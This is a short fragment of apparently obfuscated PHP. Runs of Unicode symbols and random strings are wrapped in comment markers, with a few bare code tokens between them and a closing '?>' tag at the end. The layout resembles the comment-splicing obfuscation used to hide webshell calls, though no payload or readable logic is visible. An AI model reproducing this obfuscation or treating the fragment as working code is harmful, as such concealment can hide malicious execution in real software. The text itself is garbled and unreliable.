⑩⋊⒩↹⋙﹨┪⋟Σ⒧∐┽◈∩⊁Ⓐⓩ↷┺➶⋳囍↉╥⇪♩∖⊙∓


p)qCJ⑩⋊⒩↹⋙﹨┪⋟Σ⒧∐┽◈∩⊁Ⓐⓩ↷┺➶⋳囍↉╥⇪♩∖⊙∓


-*///
 }/*-

☠╫⒜☦⓻☞⓭큐》⑨º⊛⇓┉↥￡

3|f-☠╫⒜☦⓻☞⓭큐》⑨º⊛⇓┉↥￡

-*///
}/*-
≴≾➍ⅼ➸✏
K`lUAsRi3t≴≾➍ⅼ➸✏
-*///
ILpc/*-


➯―∴┮▇﹌↉▽ⓅⓂ〃♣╗╦☎⇟


[P7z{j➯―∴┮▇﹌↉▽ⓅⓂ〃♣╗╦☎⇟


-*///
::/*-bQJcE?Vuz-*///
BNJZj/*-QP-*///
();/*-,kM(RGc-*///
 ?>